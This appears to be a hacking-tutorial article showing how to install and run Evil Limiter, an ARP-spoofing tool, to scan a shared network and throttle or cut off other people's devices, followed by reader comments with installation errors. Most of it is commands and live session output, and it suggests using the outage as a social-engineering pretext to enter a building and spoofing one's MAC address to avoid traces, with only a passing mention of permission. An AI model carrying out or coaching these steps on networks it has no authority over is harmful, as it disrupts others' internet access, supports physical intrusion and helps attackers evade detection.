If you find yourself with a roommate hogging limited data bandwidth with video games or discover a neighbor has invited themselves into your Wi-Fi network, you can easily take back control of your internet access. Evil Limiter does this by letting you control the bit rate of any device on the same network as you, allowing you to slow or even stop data transfer speeds for them completely.
Generally speaking, the average user doesn't have much visibility over who or what is on their network, so anyone with the password can slip in and start using bandwidth. In other situations, a roommate or family member may be hogging all the bandwidth unfairly to play video games or stream videos. Some routers have web interfaces that allow you to set limits on each connection, but without the password to the router, this option may not be accessible.
- Don't Miss: Use & Abuse ARP to Locate Hosts on a Network
Evil Limiter uses ARP spoofing to make devices send data to the attacking computer rather than the router, allowing us to send the data on to the router at whatever speed we like. Thanks to the way the ARP protocol works, it's possible to control the speed of any device on a shared network connection. However, because ARP spoofing only works on IPv4 networks, this tool won't be effective on IPv6 for now.
Evil Limiter for Hackers
For a hacker, Evil Limiter allows easy targeting of either one, a few, or all devices on a network. It's easy to cut the cord on the internet of a particular device at any moment, allowing for a convenient pretext for a social engineering attack. If a hacker wanted access to an employees-only area, they could identify the device of employees in the area they want to be, then limit the speed of their connection.
Rather than showing up unannounced, a hacker could throttle the manager's data connection while pretending to call from the utility company to ask if the internet connection has been slow. When the manager finds the internet is indeed slow, the hacker simply asks the best time to send someone over to fix it, giving them a pretext to enter the building and preventing the target calling the real utility company.
What You'll Need
To use Evil Limiter, you'll need a Linux system like Kali or Ubuntu with Python3 or higher. While a powerful advantage of Evil Limter is that it can be run on networks even when you don't have administrator privileges, I recommend making sure you have permission to run the tool on any network you want to test it on.
Evil Limiter uses the ARP packet to limit connection speeds which is present in IPv4 networks, but not in IPv6 networks. Because of this, IPv6 systems are out of reach of this tool, as mentioned before.
- Don't Miss: Understand & Use IPv4 to Navigate a Network
Step 1: Install Evil Limiter
To install Evil Limiter, there are only a few commands to throw in a terminal window, seen below. When the required libraries finish installing, Evil Limiter should be installed and ready to run.
~# git clone https://github.com/bitbrute/evillimiter.git
~# cd evillimiter
~# sudo python3 setup.py installStep 2: Connect to the Network
Now, you'll need to connect to your target network. Afterward, you can run Evil Limiter by typing evillimiter in a new terminal window. You should see something like below.
~# evillimiter
███████╗██╗ ██╗██╗██╗ ██╗ ██╗███╗ ███╗██╗████████╗███████╗██████╗
██╔════╝██║ ██║██║██║ ██║ ██║████╗ ████║██║╚══██╔══╝██╔════╝██╔══██╗
█████╗ ██║ ██║██║██║ ██║ ██║██╔████╔██║██║ ██║ █████╗ ██████╔╝
██╔══╝ ╚██╗ ██╔╝██║██║ ██║ ██║██║╚██╔╝██║██║ ██║ ██╔══╝ ██╔══██╗
███████╗ ╚████╔╝ ██║███████╗ ███████╗██║██║ ╚═╝ ██║██║ ██║ ███████╗██║ ██║
╚══════╝ ╚═══╝ ╚═╝╚══════╝ ╚══════╝╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
by bitbrute ~ limit devices on your network :3
v1.1.0
OK interface: wlan0
OK gateway ip: 192.168.5.1
OK gateway mac: 84:██:██:██:██:1a
OK netmask: 255.255.255.0
type help or ? to show command information.If you see this, Evil Limiter is installed, connected to the network, and ready to go.
Step 3: View Available Commands
You can explore the functionality of Evil Limiter by looking through the menu system and checking out the available commands. To do so, type a question mark in the terminal to pull up the help page.
(Main) >>> ?
scan scans for online hosts on your network.
required to find the hosts you want to limit.
hosts lists all scanned hosts.
contains host information, including IDs.
limit [ID1,ID2,...] [rate] limits bandwith of host(s) (uload/dload).
e.g.: limit 4 100kbit
limit 2,3,4 1gbit
limit all 200kbit
block [ID1,ID2,...] blocks internet access of host(s).
e.g.: block 3,2
block all
free [ID1,ID2,...] unlimits/unblocks host(s).
e.g.: free 3
free all
add [IP] (--mac [MAC]) adds custom host to host list.
mac resolved automatically.
e.g.: add 192.168.178.24
add 192.168.1.50 --mac 1c:fc:bc:2d:a6:37
clear clears the terminal window.Step 4: Discover Devices
As we can see above, the commands are straightforward. To find devices on the network, all you need to do is type scan.
(Main) >>> scan
100% |██████████████████████████████| 256/256
OK 7 hosts discovered.The scan will pull up any other hosts on the network. Type hosts to show them all.
(Main) >>> hosts
┌Hosts──────────────┬───────────────────┬──────────┬────────┐
│ ID │ IP-Address │ MAC-Address │ Hostname │ Status │
├────┼──────────────┼───────────────────┼──────────┼────────┤
│ 0 │ 192.168.5.1 │ 84:██:██:██:██:1a │ _gateway │ Free │
│ 1 │ 192.168.5.2 │ 0c:██:██:██:██:f5 │ │ Free │
│ 2 │ 192.168.5.4 │ 3c:██:██:██:██:6f │ │ Free │
│ 3 │ 192.168.5.24 │ 60:██:██:██:██:78 │ │ Free │
│ 4 │ 192.168.5.25 │ c4:██:██:██:██:2b │ │ Free │
│ 5 │ 192.168.5.61 │ 8c:██:██:██:██:f5 │ │ Free │
│ 6 │ 192.168.5.67 │ f0:██:██:██:██:b5 │ │ Free │
└────┴──────────────┴───────────────────┴──────────┴────────┘In my example, seven devices have been discovered on the network, with one of them being the router. Now we have a target list with which we can block or limit access, so let's give it a try.
Step 5: Limit or Block Devices
If you want to limit every device except the router, you can list them off one by one after the limit command. You'll also have to specify the speed you want to limit them to. In my case, I'll go with 200kbit as the limiting speed.
You could use the limit all command to choose everything, but because you want to leave the router alone, type the command limit 1,2,3,4,5,6 instead to begin limiting those specific devices. The amount of devices you list depends on how many you found.
(Main) >>> limit 1,2,3,4,5,6 200kbit
OK 192.168.5.2 limited to 200kbit.
OK 192.168.5.4 limited to 200kbit.
OK 192.168.5.24 limited to 200kbit.
OK 192.168.5.25 limited to 200kbit.
OK 192.168.5.61 limited to 200kbit.
OK 192.168.5.67 limited to 200kbit.Now that we've limited some devices, we can also select any devices we want to block entirely from accessing the network. I've found that sometimes Evil Limiter can be heavy-handed while limiting connections, and the result is that devices are limited so much they might as well be blocked.
To block a device, type the block command, then the number of any device you want to prevent from receiving data over the network.
(Main) >>> block 3
OK 192.168.5.24 blocked.Try hosts a second time. The majority of the network should be blocked or limited.
(Main) >>> hosts
┌Hosts──────────────┬───────────────────┬──────────┬─────────┐
│ ID │ IP-Address │ MAC-Address │ Hostname │ Status │
├────┼──────────────┼───────────────────┼──────────┼─────────┤
│ 0 │ 192.168.5.1 │ 84:██:██:██:██:1a │ _gateway │ Free │
│ 1 │ 192.168.5.2 │ 0c:██:██:██:██:f5 │ │ Limited │
│ 2 │ 192.168.5.4 │ 3c:██:██:██:██:6f │ │ Limited │
│ 3 │ 192.168.5.24 │ 60:██:██:██:██:78 │ │ Blocked │
│ 4 │ 192.168.5.25 │ c4:██:██:██:██:2b │ │ Limited │
│ 5 │ 192.168.5.61 │ 8c:██:██:██:██:f5 │ │ Limited │
│ 6 │ 192.168.5.67 │ f0:██:██:██:██:b5 │ │ Limited │
└────┴──────────────┴───────────────────┴──────────┴─────────┘Step 6: Restore Normal Connection
Now that you've caused chaos on the network, it's time to set things back the way they were. Fortunately, doing so is easy. You can choose to either restore devices one by one or run free all to undo any limitations on network devices.
(Main) >>> free all
OK 192.168.5.2 freed.
OK 192.168.5.4 freed.
OK 192.168.5.24 freed.
OK 192.168.5.25 freed.
OK 192.168.5.61 freed.
OK 192.168.5.67 freed.Run hosts a third time, and network access should be normal again for all devices.
(Main) >>> hosts
┌Hosts──────────────┬───────────────────┬──────────┬────────┐
│ ID │ IP-Address │ MAC-Address │ Hostname │ Status │
├────┼──────────────┼───────────────────┼──────────┼────────┤
│ 0 │ 192.168.5.1 │ 84:██:██:██:██:1a │ _gateway │ Free │
│ 1 │ 192.168.5.2 │ 0c:██:██:██:██:f5 │ │ Free │
│ 2 │ 192.168.5.4 │ 3c:██:██:██:██:6f │ │ Free │
│ 3 │ 192.168.5.24 │ 60:██:██:██:██:78 │ │ Free │
│ 4 │ 192.168.5.25 │ c4:██:██:██:██:2b │ │ Free │
│ 5 │ 192.168.5.61 │ 8c:██:██:██:██:f5 │ │ Free │
│ 6 │ 192.168.5.67 │ f0:██:██:██:██:b5 │ │ Free │
└────┴──────────────┴───────────────────┴──────────┴────────┘Evil Limiter Is Effective but Aggressive
In my tests with Evil Limiter, I found it to be an extremely effective if sometimes overbearing tool. On occasion, my attempts to limit a target would instead wholly block it, so be sure to test the effectiveness of this tool before using it anywhere important.
One thing to keep in mind when using Evil Limiter is that ARP spoofing exposes your MAC address, so using this tool on a network is effectively telling everyone that your MAC address is the router. That leaves your MAC address in the ARP cache of every machine you're targeting, so make sure to spoof your MAC address before using this tool if you don't want to be leaving your machine's fingerprints all over the network.
I hope you enjoyed this guide to using Evil Limiter! If you have any questions about this tutorial on ARP spoofing, leave a comment below, and feel free to reach me on Twitter @KodyKinzie.
Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.
15 Comments
$ sudo python3 setup.py install
Traceback (most recent call last):
File "setup.py", line 3, in <module>
from setuptools import setup, find_packages, Command
ModuleNotFoundError: No module named 'setuptools'
===================================================
What to do??
I ran into this with a specific iso I was using for a VM on Khali.
I ended up reinstalling Khali and everything is working fine.
try to install:
sudo apt-get install python-setuptools
this worked for me (don't forget the 3)
sudo apt-get install python3-setuptools
it keeps aborting when I do the sudo apt-get install python3-setuptools command what do I do?
Anything for IPv6?
ERR default interface could not be resolved. specify manually (-i). I have this problem after opening sudo evillimiter, can anyone help me?
@RALPH ALFRED TOMBADO
Damm even I am having a similar kind of issue, I have searched all over the internet and even have posted on number of threads on different forum, no solution seems to work. I am really frustrated, can anyone of you here help me resolve this issue, I am very much tired now.
Traceback (most recent call last):
File "/usr/local/bin/evillimiter", line 6, in <module>
from pkgresources import loadentry_point
File "/usr/lib/python3/dist-packages/pkg_resources/_init_.py", line 3088, in <module>
@callaside
File "/usr/lib/python3/dist-packages/pkgresources/_init_.py", line 3072, in call_aside
f(*args, *kwargs)
File "/usr/lib/python3/dist-packages/pkgresources/_init_.py", line 3101, in initializemasterworking_set
workingset = WorkingSet.build_master()
File "/usr/lib/python3/dist-packages/pkgresources/_init_.py", line 574, in build_master
ws.require(_requires_)
File "/usr/lib/python3/dist-packages/pkg_resources/_init_.py", line 892, in require
needed = self.resolve(parse_requirements(requirements))
File "/usr/lib/python3/dist-packages/pkg_resources/_init_.py", line 778, in resolve
raise DistributionNotFound(req, requirers)
pkg_resources.DistributionNotFound: The 'tqdm' distribution was not found and is required by evillimiter
How to fix this?
error while after evillimiter
Just a stupid question, but can someone confirm that this program cannot affect people who have a wired connection?
when I do sudo apt-get install python3-setuptools it keeps aborting when it asks me to continue the installation. what do I do??
NVM it works now
how do I connect evillimiter to my network?????
when I run the setup.py I keep getting this ERROR
Share Your Thoughts